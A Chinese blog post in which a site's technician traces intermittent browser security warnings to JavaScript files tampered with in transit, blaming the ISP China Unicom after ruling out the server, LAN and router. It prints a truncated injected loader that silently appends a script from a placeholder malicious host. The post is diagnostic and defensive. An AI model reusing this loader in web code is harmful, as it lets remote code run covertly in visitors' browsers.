最近有网友反映打开我们网站腾讯电脑管家会弹出窗口提示危险网站,提示的网址并非我们网站的网址。难道我们网站被挂马了?
这个必须要查,下面是检查的过程:
1、检查页面,页面没有不正常内容。
2、检查js,发现js被挂马,内容如下:
(function(){try{var o='m-_-m',D=document;if(!D.getElementById(o)){var j='网站js路径.js',J=j+(~j.indexOf('?')?'&':'?')+new Date().getTime(),M='http://携带恶意代码网站/?tsliese=27308832',C=D.currentScript,H=D.getElementsByTagName('head')[0],N=function(s,i){var I=D.createElement('script');I.type='text/javascript';if(i)I.id=i;I.src=s;H.appendChild(I);};if(self==top){N(M,o);}if(!C){C=(function(){var S=D.scripts,l=S.length,i=0;for(;i<l;++i){if(S[i].src===j){return S[i];}}})();}C&&((C.defer||C.async)?N(J):D.write('后面略去
3、检查服务器js文件完全正常,根本没有被挂马,经过再次测试发现每刷新几次就有一次js文件被串改,问题出在哪呢?
4、测试其它网站js文件发现也有此类情况,而且浏览器也还了几个,可以判定据对不是服务器或网站被挂马。
5、现在只能检查我们局域网的问题了,难道路由器出问题了?检查ARP,没有发现有ARP攻击。路由器重启,甚至恢复出厂设置,还是有问题。
6、最后干脆直接用电脑直接拨号上网,发现还是有问题,这就可以判断既不是网站及服务器问题,也不是局域网和路由器问题。附近朋友家的联通线路也发现同样的问题了,可以判断问题出在接入商联通(不知道是哪个路由出问题了)那里。
7、以前经常看到联通经常挂一些广告的情况,怎么现在直接替换js文件,导致我们时常访问网站不正常。
看似以上几步过程,实际经历了一个来月才查出具体原因。经查被替换的js文件有这些特点:隐秘性很强,不是每次都出现;js代码纯在更新,上面只是最近发现的其中一条;在本地电脑写cookie,并能根据本地客户端情况出不出代码和出什么内容的代码。
作为技术人员,调查这事儿也费了不少精力和时间,我把此经历分享下,发在编辑网上,希望能对也同样遇到此情况的有一点点帮助。
